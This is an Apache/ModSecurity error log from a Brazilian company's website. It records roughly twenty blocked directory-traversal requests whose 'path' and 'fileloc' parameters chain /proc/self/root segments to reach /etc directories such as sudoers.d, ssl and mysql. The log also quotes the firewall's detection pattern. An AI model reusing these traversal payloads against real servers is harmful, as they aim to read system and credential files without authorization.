[Tue Mar 17 09:08:48.192339 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.241.46:60894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEUAQohV2v-7oj5HH3rgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:08:56.852272 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:47902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEWJDEJR9VXonE_-1LmQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:08:59.073419 2026] [:error] [pid 1210:tid 140411641214720] [client 74.7.241.46:40998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEWlKJy4A1bGlmj9BScgAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:09:02.776617 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:41012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEXtCmCSWTlPouqorIEgAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:07.431760 2026] [:error] [pid 1961:tid 140411658000128] [client 74.7.241.46:41024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEY3RXaaWotPICgYsiYwAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:08.727198 2026] [:error] [pid 7000:tid 140411582465792] [client 74.7.241.46:50914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEZBePVOt35XCGZP8svwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:09:10.979207 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.46:50924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEZqBJNF7axNlVR0X5_QAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:12.566990 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:53142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEaAeiSKl8TjouI-b_XQAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:13.937988 2026] [:error] [pid 11469:tid 140411557287680] [client 74.7.243.203:40728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEaZDEJR9VXonE_-1LoAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:22.793601 2026] [:error] [pid 1961:tid 140411607643904] [client 74.7.243.203:40730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEcnRXaaWotPICgYsieAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:23.239672 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:50936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEc-82sZHvlq4xgHq_7wAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:25.207307 2026] [:error] [pid 7000:tid 140411666392832] [client 74.7.243.203:47080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEdRePVOt35XCGZP8swwAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:28.678823 2026] [:error] [pid 7000:tid 140411590858496] [client 74.7.243.203:47084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEeBePVOt35XCGZP8sxwAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:30.161966 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:56314] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEegeiSKl8TjouI-b_YAAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:31.311947 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.243.203:56324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEe9CmCSWTlPouqorIHgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:32.607033 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:56328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEfJqmL8PQht4WJFlEnQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:35.978727 2026] [:error] [pid 1210:tid 140411708356352] [client 74.7.243.203:56342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEf1KJy4A1bGlmj9BSgAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:37.360980 2026] [:error] [pid 1210:tid 140411582465792] [client 74.7.243.203:56356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEgVKJy4A1bGlmj9BSgQAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:39.203741 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:56368] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEggeiSKl8TjouI-b_YwAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:40.690870 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:57464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEhKBJNF7axNlVR0X6BQAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:45.251303 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:57472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEidCmCSWTlPouqorIKQAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:46.547437 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.203:57486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEigeiSKl8TjouI-b_ZQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
